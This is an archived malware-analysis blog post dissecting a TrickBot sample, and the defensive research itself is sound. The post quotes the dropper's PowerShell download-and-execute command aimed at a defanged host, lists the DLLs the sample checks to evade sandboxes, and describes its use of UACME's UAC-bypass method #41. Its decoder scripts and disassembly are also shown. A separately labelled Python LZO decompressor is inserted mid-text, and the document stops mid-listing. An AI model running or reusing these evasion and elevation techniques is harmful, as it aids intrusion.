{
	"id": "e3eda40b-7f87-4a84-8306-98f6b8353854",
	"created_at": "2026-04-06T00:06:40.206081Z",
	"updated_at": "2026-04-10T13:11:25.651415Z",
	"deleted_at": null,
	"sha1_hash": "b468dd20dba589ca35827d289ab739b29a629f18",
	"title": "TrickBot \u0026 UACME",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 152354,
	"plain_text": "TrickBot \u0026 UACME\r\nPublished: 2018-04-16 · Archived: 2026-04-05 17:56:30 UTC\r\nTrickBot Secure Message Delivery 12apr2018\r\nDoc delivery: 3782f96c6d9f3136651da208465fa939313b7e4f21bdc4ef10c05926e0428a65\r\n'\"\" | Out-File -encoding ASCII -FilePath %TEMP%\\bpknnhvxb_cx.bat;Start-Process '%TEMP%\\bpknnhvxb_cx.bat' -WindowStyl\r\ncmd.exe /c \"\"%TEMP%\\bpknnhvxb_cx.bat\" \" (PID: 4568)\r\npowershell.exe PowerShell \"function ggft([String] $uibzkllsrb5)\r\n{(New-Object System.Net.WebClient).DownloadFile($uibzkllsrb5,'%TEMP%\\sethasn2.exe');Start-Process '%TEMP%\\sethasn2.ex\r\nm-tensou[.]net/svoren.png - 2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c\r\nThe macro uses a custom string lookup: a keyboard-order alphabet in which every character of an encoded string is replaced by the character four positions before it.\r\nVBA FORM STRING IN '3782f96c6d9f3136651da208465fa939313b.doc' - OLE stream: u'Macros/wordapollo/o'\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nqwertyuiop[]asdfghjkl;zxcvbnm,./QWERTYUIOP{}ASDFGHJKL:\"ZXCVBNM\u003c\u003e?!@#$%^\u0026*()\\1234567890 -|'\r\nk = r\"\"\"qwertyuiop[]asdfghjkl;zxcvbnm,./QWERTYUIOP{}ASDFGHJKL:\"ZXCVBNM\u003c\u003e?!@#$%^\u0026*()\\1234567890 -|'\"\"\"\r\nblah = 'Qwou/ha[E/uoRh,aiu/Es/l'\r\nout = \"\"\r\nfor i in range(len(blah)):\r\n temp = k.index(blah[i])\r\n out += k[(temp-4)%len(k)]\r\nprint(out)\r\nTrick payload\r\n2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c\r\nThe sample has multiple internal layers in the crypter, along with a function-decoding layer that decodes each individual function as it is needed.\r\nIt checks for the presence of the following DLLs by walking the loaded-module list in the PEB:\r\npstorec.dll\r\nvmcheck.dll\r\ndbghelp.dll\r\nwpespy.dll\r\napi_log.dll\r\nSbieDll.dll\r\nSxIn.dll\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 1 of 21\n\ndir_watch.dll\r\nSf2.dll\r\ncmdvrt32.dll\r\nsnxhk.dll\r\nLoader Functions\r\nFunction that walks the PEB's InMemoryOrderModuleList (PEB-\u003eLdr+0x14), compares each entry's BaseDllName (+0x30) with a passed-in string and returns the matching module's DllBase (+0x18):\r\n01DB04AA 83EC 10 
SUB ESP,10\r\n01DB04AD C745 F4 00000000 MOV DWORD PTR SS:[EBP-C],0\r\n01DB04B4 64:A1 30000000 MOV EAX,DWORD PTR FS:[30]\r\n01DB04BA 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX\r\n01DB04BD C745 F8 00000000 MOV DWORD PTR SS:[EBP-8],0\r\n01DB04C4 C745 FC 00000000 MOV DWORD PTR SS:[EBP-4],0\r\n01DB04CB C745 F0 00000000 MOV DWORD PTR SS:[EBP-10],0\r\n01DB04D2 837D F4 00 CMP DWORD PTR SS:[EBP-C],0\r\n01DB04D6 74 5E JE SHORT 01DB0536\r\n01DB04D8 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]\r\n01DB04DB 8B51 0C MOV EDX,DWORD PTR DS:[ECX+C]\r\n01DB04DE 83C2 14 ADD EDX,14\r\n01DB04E1 8955 F8 MOV DWORD PTR SS:[EBP-8],EDX\r\n01DB04E4 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]\r\n01DB04E7 8B08 MOV ECX,DWORD PTR DS:[EAX]\r\n01DB04E9 894D FC MOV DWORD PTR SS:[EBP-4],ECX\r\n01DB04EC 837D F8 00 CMP DWORD PTR SS:[EBP-8],0\r\n01DB04F0 74 44 JE SHORT 01DB0536\r\n01DB04F2 837D FC 00 CMP DWORD PTR SS:[EBP-4],0\r\n01DB04F6 74 3E JE SHORT 01DB0536\r\n01DB04F8 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8]\r\n01DB04FB 3B55 FC CMP EDX,DWORD PTR SS:[EBP-4]\r\n01DB04FE 74 36 JE SHORT 01DB0536\r\n01DB0500 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\n01DB0503 83E8 08 SUB EAX,8\r\n01DB0506 8945 F0 MOV DWORD PTR SS:[EBP-10],EAX\r\n01DB0509 74 21 JE SHORT 01DB052C\r\n01DB050B 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]\r\n01DB050E 51 PUSH ECX\r\n01DB050F 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]\r\n01DB0512 8B42 30 MOV EAX,DWORD PTR DS:[EDX+30]\r\n01DB0515 50 PUSH EAX\r\n01DB0516 6A 14 PUSH 14\r\n01DB0518 E8 BB0BFFFF CALL 01DA10D8\r\n01DB051D 83C4 08 ADD ESP,8\r\n01DB0520 85C0 TEST EAX,EAX\r\n01DB0522 74 08 JE SHORT 01DB052C\r\n01DB0524 8B4D F0 MOV ECX,DWORD PTR SS:[EBP-10]\r\n01DB0527 8B41 18 MOV EAX,DWORD PTR DS:[ECX+18]\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 2 of 21\n\n01DB052A EB 0C JMP SHORT 01DB0538\r\n01DB052C 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]\r\n01DB052F 8B02 MOV EAX,DWORD PTR DS:[EDX]\r\n01DB0531 8945 FC MOV DWORD PTR SS:[EBP-4],EAX\r\n01DB0534 ^EB C2 JMP SHORT 01DB04F8\r\n01DB0536 33C0 XOR 
EAX,EAX\r\n01DB0538 8BE5 MOV ESP,EBP\r\n01DB053A 5D POP EBP\r\n01DB053B C3 RETN\r\nString decoding is base64 with a custom alphabet:\r\n01DA252C 8B4D E0 MOV ECX,DWORD PTR SS:[EBP-20]\r\n01DA252F 83E9 01 SUB ECX,1\r\n01DA2532 894D E0 MOV DWORD PTR SS:[EBP-20],ECX\r\n01DA2535 85C0 TEST EAX,EAX\r\n01DA2537 0F84 00010000 JE 01DA263D\r\n01DA253D 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]\r\n01DA2540 0355 F8 ADD EDX,DWORD PTR SS:[EBP-8]\r\n01DA2543 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\n01DA2546 8A0A MOV CL,BYTE PTR DS:[EDX]\r\n01DA2548 884C28 E4 MOV BYTE PTR DS:[EAX+EBP-1C],CL\r\n01DA254C 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]\r\n01DA254F 83C2 01 ADD EDX,1\r\n01DA2552 8955 FC MOV DWORD PTR SS:[EBP-4],EDX\r\n01DA2555 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]\r\n01DA2558 83C0 01 ADD EAX,1\r\n01DA255B 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX\r\n01DA255E 837D FC 04 CMP DWORD PTR SS:[EBP-4],4\r\n01DA2562 0F85 D0000000 JNZ 01DA2638\r\n01DA2568 C745 FC 00000000 MOV DWORD PTR SS:[EBP-4],0\r\n01DA256F EB 09 JMP SHORT 01DA257A\r\n01DA2571 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]\r\n01DA2574 83C1 01 ADD ECX,1\r\n01DA2577 894D FC MOV DWORD PTR SS:[EBP-4],ECX\r\n01DA257A 837D FC 04 CMP DWORD PTR SS:[EBP-4],4\r\n01DA257E 7D 42 JGE SHORT 01DA25C2\r\n01DA2580 C745 DC 00000000 MOV DWORD PTR SS:[EBP-24],0\r\n01DA2587 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C]\r\n01DA258A 0355 DC ADD EDX,DWORD PTR SS:[EBP-24]\r\n01DA258D 0FBE02 MOVSX EAX,BYTE PTR DS:[EDX]\r\n01DA2590 85C0 TEST EAX,EAX\r\n01DA2592 74 2C JE SHORT 01DA25C0\r\n01DA2594 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]\r\n01DA2597 034D DC ADD ECX,DWORD PTR SS:[EBP-24]\r\n01DA259A 0FBE11 MOVSX EDX,BYTE PTR DS:[ECX]\r\n01DA259D 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 3 of 21\n\n01DA25A0 0FBE4C28 E4 MOVSX ECX,BYTE PTR DS:[EAX+EBP-1C]\r\n01DA25A5 3BD1 CMP EDX,ECX\r\n01DA25A7 75 0C JNZ SHORT 01DA25B5\r\n01DA25A9 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]\r\n01DA25AC 8A45 DC MOV AL,BYTE PTR 
SS:[EBP-24]\r\n01DA25AF 88442A E4 MOV BYTE PTR DS:[EDX+EBP-1C],AL\r\n01DA25B3 EB 0B JMP SHORT 01DA25C0\r\n01DA25B5 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]\r\n01DA25B8 83C1 01 ADD ECX,1\r\n01DA25BB 894D DC MOV DWORD PTR SS:[EBP-24],ECX\r\n01DA25BE ^EB C7 JMP SHORT 01DA2587\r\n01DA25C0 ^EB AF JMP SHORT 01DA2571\r\n01DA25C2 0FBE55 E4 MOVSX EDX,BYTE PTR SS:[EBP-1C]\r\n01DA25C6 0FBE45 E5 MOVSX EAX,BYTE PTR SS:[EBP-1B]\r\n01DA25CA 83E0 30 AND EAX,30\r\n01DA25CD C1F8 04 SAR EAX,4\r\n01DA25D0 8D0C90 LEA ECX,DWORD PTR DS:[EAX+EDX*4]\r\n01DA25D3 884D EC MOV BYTE PTR SS:[EBP-14],CL\r\n01DA25D6 0FBE55 E5 MOVSX EDX,BYTE PTR SS:[EBP-1B]\r\n01DA25DA 83E2 0F AND EDX,0F\r\n01DA25DD C1E2 04 SHL EDX,4\r\n01DA25E0 0FBE45 E6 MOVSX EAX,BYTE PTR SS:[EBP-1A]\r\n01DA25E4 83E0 3C AND EAX,3C\r\n01DA25E7 C1F8 02 SAR EAX,2\r\n01DA25EA 03D0 ADD EDX,EAX\r\n01DA25EC 8855 ED MOV BYTE PTR SS:[EBP-13],DL\r\n01DA25EF 0FBE4D E6 MOVSX ECX,BYTE PTR SS:[EBP-1A]\r\n01DA25F3 83E1 03 AND ECX,3\r\n01DA25F6 C1E1 06 SHL ECX,6\r\n01DA25F9 0FBE55 E7 MOVSX EDX,BYTE PTR SS:[EBP-19]\r\n01DA25FD 03CA ADD ECX,EDX\r\n01DA25FF 884D EE MOV BYTE PTR SS:[EBP-12],CL\r\n01DA2602 C745 FC 00000000 MOV DWORD PTR SS:[EBP-4],0\r\n01DA2609 EB 09 JMP SHORT 01DA2614\r\n01DA260B 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\n01DA260E 83C0 01 ADD EAX,1\r\n01DA2611 8945 FC MOV DWORD PTR SS:[EBP-4],EAX\r\n01DA2614 837D FC 03 CMP DWORD PTR SS:[EBP-4],3\r\n01DA2618 7D 17 JGE SHORT 01DA2631\r\n01DA261A 8B4D E8 MOV ECX,DWORD PTR SS:[EBP-18]\r\n01DA261D 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]\r\n01DA2620 8A442A EC MOV AL,BYTE PTR DS:[EDX+EBP-14]\r\n01DA2624 8801 MOV BYTE PTR DS:[ECX],AL\r\n01DA2626 8B4D E8 MOV ECX,DWORD PTR SS:[EBP-18]\r\n01DA2629 83C1 01 ADD ECX,1\r\n01DA262C 894D E8 MOV DWORD PTR SS:[EBP-18],ECX\r\n01DA262F ^EB DA JMP SHORT 01DA260B\r\n01DA2631 C745 FC 00000000 MOV DWORD PTR SS:[EBP-4],0\r\n01DA2638 ^E9 ECFEFFFF JMP 01DA2529\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 4 of 21\n\n01DA263D 837D FC 00 CMP 
DWORD PTR SS:[EBP-4],0\r\n01DA2641 0F84 F6000000 JE 01DA273D\r\n01DA2647 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]\r\n01DA264A 8955 DC MOV DWORD PTR SS:[EBP-24],EDX\r\n01DA264D EB 09 JMP SHORT 01DA2658\r\n01DA264F 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]\r\n01DA2652 83C0 01 ADD EAX,1\r\n01DA2655 8945 DC MOV DWORD PTR SS:[EBP-24],EAX\r\n01DA2658 837D DC 04 CMP DWORD PTR SS:[EBP-24],4\r\n01DA265C 7D 0A JGE SHORT 01DA2668\r\n01DA265E 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]\r\n01DA2661 C64429 E4 00 MOV BYTE PTR DS:[ECX+EBP-1C],0\r\n01DA2666 ^EB E7 JMP SHORT 01DA264F\r\n01DA2668 C745 DC 00000000 MOV DWORD PTR SS:[EBP-24],0\r\n01DA266F EB 09 JMP SHORT 01DA267A\r\n01DA2671 8B55 DC MOV EDX,DWORD PTR SS:[EBP-24]\r\n01DA2674 83C2 01 ADD EDX,1\r\n01DA2677 8955 DC MOV DWORD PTR SS:[EBP-24],EDX\r\n01DA267A 837D DC 04 CMP DWORD PTR SS:[EBP-24],4\r\n01DA267E 7D 49 JGE SHORT 01DA26C9\r\n01DA2680 C745 D4 00000000 MOV DWORD PTR SS:[EBP-2C],0\r\n01DA2687 C745 D8 4637DC01 MOV DWORD PTR SS:[EBP-28],1DC3746 ; ASCII \"56tAMJ1GmOs3TK20g4I+ueRbpwqjNBVxzynF7ha\r\n01DA268E 8B45 D8 MOV EAX,DWORD PTR SS:[EBP-28]\r\n01DA2691 0345 D4 ADD EAX,DWORD PTR SS:[EBP-2C]\r\n01DA2694 0FBE08 MOVSX ECX,BYTE PTR DS:[EAX]\r\n01DA2697 85C9 TEST ECX,ECX\r\n01DA2699 74 2C JE SHORT 01DA26C7\r\n01DA269B 8B55 D8 MOV EDX,DWORD PTR SS:[EBP-28]\r\n01DA269E 0355 D4 ADD EDX,DWORD PTR SS:[EBP-2C]\r\n01DA26A1 0FBE02 MOVSX EAX,BYTE PTR DS:[EDX]\r\n01DA26A4 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]\r\n01DA26A7 0FBE5429 E4 MOVSX EDX,BYTE PTR DS:[ECX+EBP-1C]\r\n01DA26AC 3BC2 CMP EAX,EDX\r\n01DA26AE 75 0C JNZ SHORT 01DA26BC\r\n01DA26B0 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]\r\n01DA26B3 8A4D D4 MOV CL,BYTE PTR SS:[EBP-2C]\r\n01DA26B6 884C28 E4 MOV BYTE PTR DS:[EAX+EBP-1C],CL\r\n01DA26BA EB 0B JMP SHORT 01DA26C7\r\n01DA26BC 8B55 D4 MOV EDX,DWORD PTR SS:[EBP-2C]\r\n01DA26BF 83C2 01 ADD EDX,1\r\n01DA26C2 8955 D4 MOV DWORD PTR SS:[EBP-2C],EDX\r\n01DA26C5 ^EB C7 JMP SHORT 01DA268E\r\n01DA26C7 ^EB A8 JMP SHORT 01DA2671\r\n01DA26C9 0FBE45 E4 MOVSX 
EAX,BYTE PTR SS:[EBP-1C]\r\n01DA26CD 0FBE4D E5 MOVSX ECX,BYTE PTR SS:[EBP-1B]\r\n01DA26D1 83E1 30 AND ECX,30\r\n01DA26D4 C1F9 04 SAR ECX,4\r\n01DA26D7 8D1481 LEA EDX,DWORD PTR DS:[ECX+EAX*4]\r\n01DA26DA 8855 EC MOV BYTE PTR SS:[EBP-14],DL\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 5 of 21\n\n01DA26DD 0FBE45 E5 MOVSX EAX,BYTE PTR SS:[EBP-1B]\r\n01DA26E1 83E0 0F AND EAX,0F\r\n01DA26E4 C1E0 04 SHL EAX,4\r\n01DA26E7 0FBE4D E6 MOVSX ECX,BYTE PTR SS:[EBP-1A]\r\n01DA26EB 83E1 3C AND ECX,3C\r\n01DA26EE C1F9 02 SAR ECX,2\r\n01DA26F1 03C1 ADD EAX,ECX\r\n01DA26F3 8845 ED MOV BYTE PTR SS:[EBP-13],AL\r\n01DA26F6 0FBE55 E6 MOVSX EDX,BYTE PTR SS:[EBP-1A]\r\n01DA26FA 83E2 03 AND EDX,3\r\n01DA26FD C1E2 06 SHL EDX,6\r\n01DA2700 0FBE45 E7 MOVSX EAX,BYTE PTR SS:[EBP-19]\r\n01DA2704 03D0 ADD EDX,EAX\r\n01DA2706 8855 EE MOV BYTE PTR SS:[EBP-12],DL\r\n01DA2709 C745 DC 00000000 MOV DWORD PTR SS:[EBP-24],0\r\n01DA2710 EB 09 JMP SHORT 01DA271B\r\n01DA2712 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]\r\n01DA2715 83C1 01 ADD ECX,1\r\n01DA2718 894D DC MOV DWORD PTR SS:[EBP-24],ECX\r\n01DA271B 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]\r\n01DA271E 83EA 01 SUB EDX,1\r\n01DA2721 3955 DC CMP DWORD PTR SS:[EBP-24],EDX\r\n01DA2724 7D 17 JGE SHORT 01DA273D\r\n01DA2726 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18]\r\n01DA2729 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]\r\n01DA272C 8A5429 EC MOV DL,BYTE PTR DS:[ECX+EBP-14]\r\n01DA2730 8810 MOV BYTE PTR DS:[EAX],DL\r\n01DA2732 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18]\r\n01DA2735 83C0 01 ADD EAX,1\r\n01DA2738 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX\r\n01DA273B ^EB D5 JMP SHORT 01DA2712\r\n01DA273D 8B4D E8 MOV ECX,DWORD PTR SS:[EBP-18]\r\n01DA2740 C601 00 MOV BYTE PTR DS:[ECX],0\r\n01DA2743 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18]\r\n01DA2746 2B45 0C SUB EAX,DWORD PTR SS:[EBP+C]\r\n01DA2749 8BE5 MOV ESP,EBP\r\n01DA274B 5D POP EBP\r\n01DA274C C3 RETN\r\nimport base64\r\ndata = 
'N8yhj1fiTnY7j1f\\x00jr47j1fPw1oL\\x00N8yLB8JfqIY7j1f\\x00pR48pb6STimPw1oL\\x00gFpZ\\x00Tg\\x00Tz\\x00N/wFq1ciBtYhV1u\r\nkey = '56tAMJ1GmOs3TK20g4I+ueRbpwqjNBVxzynF7hardSDEL9PvfoXiZl8/HYUCQckW'\r\nstd_b64 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\nfor s in data.split('\\x00'):\r\n s = s.translate(str.maketrans(key,std_b64))\r\n if len(s)%4 != 0:\r\n  s += '='*(4 - len(s)%4)\r\n print(base64.b64decode(s))\r\nb'shell32.dll'\r\nb'ntdll.dll'\r\nb'shlwapi.dll'\r\nb'advapi32.dll'\r\nb'B64'\r\nb'1'\r\nb'2'\r\nb'svchost.exe'\r\nb'\\\\NetViewer'\r\nb'pstorec.dll'\r\nb'vmcheck.dll'\r\nb'dbghelp.dll'\r\nb'wpespy.dll'\r\nb'api_log.dll'\r\nb'SbieDll.dll'\r\nb'SxIn.dll'\r\nb'dir_watch.dll'\r\nb'Sf2.dll'\r\nb'cmdvrt32.dll'\r\nb'snxhk.dll'\r\nb'MSEDGE'\r\nb'IEUser'\r\nb'SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\'\r\nb'ProductName'\r\nb'Evaluation'\r\nb'SOFTWARE\\\\Microsoft\\\\Virtual Machine'\r\nb'{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'\r\nb'{6EDD6D74-C007-4E75-B76A-E5740995E24C}'\r\nb'explorer.exe'\r\nb'bloody booty bla de bludy botty bla lhe capitaine bloode!'\r\nb'ole32.dll'\r\nb'wtsapi32'\r\nb'WTSEnumerateSessionsA'\r\nb'WTSFreeMemory'\r\nb'WTSGetActiveConsoleSessionId'\r\nb'WTSQueryUserToken'\r\nb'SeTcbPrivilege'\r\nb'Elevation:Administrator!new:'\r\nb'.log'\r\nIt then checks whether it is running as LOCAL SYSTEM, using the same approach as UACME's util.c:\r\nhttps://github.com/hfiref0x/UACME/blob/b8c4c71e1ba3b6646a48c0b655ce6d6e388c6112/Source/Shared/util.c\r\n status = RtlAllocateAndInitializeSid(\r\n \u0026SECURITY_NT_AUTHORITY,\r\n 1,\r\n SECURITY_LOCAL_SYSTEM_RID,\r\n 0, 0, 0, 0, 0, 0, 0,\r\n \u0026SystemSid);\r\nThere are also some strings based on UACME method #41, which F-Secure reported on in December 2017[1]. 
Around the same time, #41 was also added to IcedID, in late November of 2017[2].\r\nIf the SID does not match, it checks whether it is running out of %AppData%. If not, it checks whether it is running out of system32, or else it copies itself into a NetViewer folder under %AppData%, slightly manipulating its filename in the process. Afterwards it checks what elevation level it is running at, using code similar to supGetElevationType from UACME[5]. If it is executing as TokenElevationTypeLimited, it moves on to using method #41 from UACME.\r\nI let it run all the way up until it was about to call ShellExec on the COM object and then replaced the malicious binary location with cmd.exe for a pretty picture:\r\nIf that lines up, an XOR-encoded, compressed PE file is decoded using the same encoding routine that was used on the functions.\r\nNext it is decompressed using LZO. The code matches the decompression code used by Dyreza, but since code sharing between the two has already been established it would not be unusual for them to reuse libraries they already had on hand. It appears to be MiniLZO, but LZO is a common compression library so it is hard to say which implementation specifically. 
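The routine in the listing that follows is the familiar LZO1X decoder, and the paragraph above only names it. As an added example (not the author's tooling and not code from the sample), here is a byte-exact Python port of the minilzo lzo1x_decompress logic, with the 0x801 and 0x4000 lookbehind constants and the two-bit trailing-literal state that the disassembly works through. The compressed streams at the bottom are hand-encoded for this example; the function raises ValueError when the input is not consumed exactly up to the 11 00 00 end marker, mirroring the LZO_E_INPUT_NOT_CONSUMED return code computed at the end of the routine.

```python
# Added example for this page: a byte-exact Python port of the minilzo
# lzo1x_decompress logic (not the author's tooling, not code from the sample).
# The 0x801 and 0x4000 lookbehind constants are the ones in the disassembly.

def _extended_count(src, ip, base):
    # Zero bytes add 255 each; the first non-zero byte ends the count.
    total = 0
    while src[ip] == 0:
        total += 255
        ip += 1
    return total + base + src[ip], ip + 1

def lzo1x_decompress(src):
    out = bytearray()

    def copy_match(dist, length):
        start = len(out) - dist
        if start < 0:
            raise ValueError('lookbehind overrun')
        for i in range(length):          # byte-wise so overlapping (RLE) copies work
            out.append(out[start + i])

    ip = 0
    t = src[ip]; ip += 1
    if t > 17:                           # first byte 17+n: n initial literals
        t -= 17
        out += src[ip:ip + t]; ip += t
        if t < 4:
            t = src[ip]; ip += 1
            state = 'match'
        else:
            state = 'first_literal'
    else:
        ip = 0
        state = 'literal'

    while True:
        if state == 'literal':
            t = src[ip]; ip += 1
            if t >= 16:
                state = 'match'
                continue
            if t == 0:                   # long literal run (18 bytes or more)
                t, ip = _extended_count(src, ip, 15)
            out += src[ip:ip + t + 3]; ip += t + 3
            state = 'first_literal'
        elif state == 'first_literal':
            t = src[ip]; ip += 1
            if t >= 16:
                state = 'match'
                continue
            # M1 right after a literal run: 3 bytes from at least 0x801 back
            dist = 0x801 + (t >> 2) + (src[ip] << 2); ip += 1
            copy_match(dist, 3)
            state = 'done'
        elif state == 'match':
            if t >= 64:                  # M2: LLLDDDSS D, length 3..8
                dist = 1 + ((t >> 2) & 7) + (src[ip] << 3); ip += 1
                length = (t >> 5) + 1
            elif t >= 32:                # M3: 001LLLLL DDDDDDSS DDDDDDDD
                length = t & 31
                if length == 0:
                    length, ip = _extended_count(src, ip, 31)
                length += 2
                dist = 1 + (src[ip] >> 2) + (src[ip + 1] << 6); ip += 2
            elif t >= 16:                # M4: 0001HLLL DDDDDDSS DDDDDDDD
                length = t & 7
                if length == 0:
                    length, ip = _extended_count(src, ip, 7)
                length += 2
                dist = ((t & 8) << 11) + (src[ip] >> 2) + (src[ip + 1] << 6); ip += 2
                if dist == 0:            # 11 00 00 is the end-of-stream marker
                    break
                dist += 0x4000
            else:                        # M1: 0000DDSS D, 2 bytes
                dist = 1 + (t >> 2) + (src[ip] << 2); ip += 1
                length = 2
            copy_match(dist, length)
            state = 'done'
        else:                            # 'done': SS bits give 0..3 trailing literals
            s = src[ip - 2] & 3
            if s == 0:
                state = 'literal'
            else:
                out += src[ip:ip + s]; ip += s
                t = src[ip]; ip += 1
                state = 'match'

    if ip != len(src):                   # mirrors the LZO_E_INPUT_NOT_CONSUMED path
        raise ValueError('input not consumed')
    return bytes(out)

SAMPLE_STREAMS = [  # hand-encoded for this example, not taken from the sample
    (bytes([0x17]) + b'hello ' + bytes([0xB4, 0, 0x24, 0x14, 0, 3]) + b'world!'
     + bytes([0x11, 0, 0]), b'hello hello hello world!'),   # M2, M3, literal run
    (bytes([0x15]) + b'abcd' + bytes([0x6E, 0]) + b'XY' + bytes([4, 2, 0x11, 0, 0]),
     b'abcdabcdXYab'),                   # M2 with 2 trailing literals, then M1
    (bytes([0x12]) + b'a' + bytes([0xC0, 0, 0x11, 0, 0]), b'aaaaaaaa'),  # RLE overlap
]
```

Call lzo1x_decompress on the buffer left after the XOR layer is stripped; a carve that is too long raises at the consumed-input check, and one that is too short raises an IndexError from reading past the end, which is the same pair of conditions the routine reports as -8 and -4 in the listing.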
Also of note is the same\r\ndecompression routine is utilized to decompress the loader bytecode as well.\r\nDecompression code:\r\n01DB31DE 57 PUSH EDI\r\n01DB31DF 56 PUSH ESI\r\n01DB31E0 53 PUSH EBX\r\n01DB31E1 51 PUSH ECX\r\n01DB31E2 52 PUSH EDX\r\n01DB31E3 83EC 0C SUB ESP,0C\r\n01DB31E6 FC CLD\r\n01DB31E7 8B7424 28 MOV ESI,DWORD PTR SS:[ESP+28]\r\n01DB31EB 8B7C24 30 MOV EDI,DWORD PTR SS:[ESP+30]\r\n01DB31EF BD 03000000 MOV EBP,3\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 8 of 21\n\n01DB31F4 31C0 XOR EAX,EAX\r\n01DB31F6 31DB XOR EBX,EBX\r\n01DB31F8 AC LODS BYTE PTR DS:[ESI]\r\n01DB31F9 3C 11 CMP AL,11\r\n01DB31FB 76 1B JBE SHORT 01DB3218\r\n01DB31FD 2C 0E SUB AL,0E\r\n01DB31FF EB 22 JMP SHORT 01DB3223\r\n01DB3201 05 FF000000 ADD EAX,0FF\r\n01DB3206 8A1E MOV BL,BYTE PTR DS:[ESI]\r\n01DB3208 46 INC ESI\r\n01DB3209 08DB OR BL,BL\r\n01DB320B ^74 F4 JE SHORT 01DB3201\r\n01DB320D 8D4418 15 LEA EAX,DWORD PTR DS:[EAX+EBX+15]\r\n01DB3211 EB 10 JMP SHORT 01DB3223\r\n01DB3213 89F6 MOV ESI,ESI\r\n01DB3215 8A06 MOV AL,BYTE PTR DS:[ESI]\r\n01DB3217 46 INC ESI\r\n01DB3218 3C 10 CMP AL,10\r\n01DB321A 73 41 JNB SHORT 01DB325D\r\n01DB321C 08C0 OR AL,AL\r\n01DB321E ^74 E6 JE SHORT 01DB3206\r\n01DB3220 83C0 06 ADD EAX,6\r\n01DB3223 89C1 MOV ECX,EAX\r\n01DB3225 31E8 XOR EAX,EBP\r\n01DB3227 C1E9 02 SHR ECX,2\r\n01DB322A 21E8 AND EAX,EBP\r\n01DB322C 8B16 MOV EDX,DWORD PTR DS:[ESI]\r\n01DB322E 83C6 04 ADD ESI,4\r\n01DB3231 8917 MOV DWORD PTR DS:[EDI],EDX\r\n01DB3233 83C7 04 ADD EDI,4\r\n01DB3236 49 DEC ECX\r\n01DB3237 ^75 F3 JNZ SHORT 01DB322C\r\n01DB3239 29C6 SUB ESI,EAX\r\n01DB323B 29C7 SUB EDI,EAX\r\n01DB323D 8A06 MOV AL,BYTE PTR DS:[ESI]\r\n01DB323F 46 INC ESI\r\n01DB3240 3C 10 CMP AL,10\r\n01DB3242 73 19 JNB SHORT 01DB325D\r\n01DB3244 C1E8 02 SHR EAX,2\r\n01DB3247 8A1E MOV BL,BYTE PTR DS:[ESI]\r\n01DB3249 8D97 FFF7FFFF LEA EDX,DWORD PTR DS:[EDI-801]\r\n01DB324F 8D0498 LEA EAX,DWORD PTR DS:[EAX+EBX*4]\r\n01DB3252 46 INC ESI\r\n01DB3253 29C2 SUB 
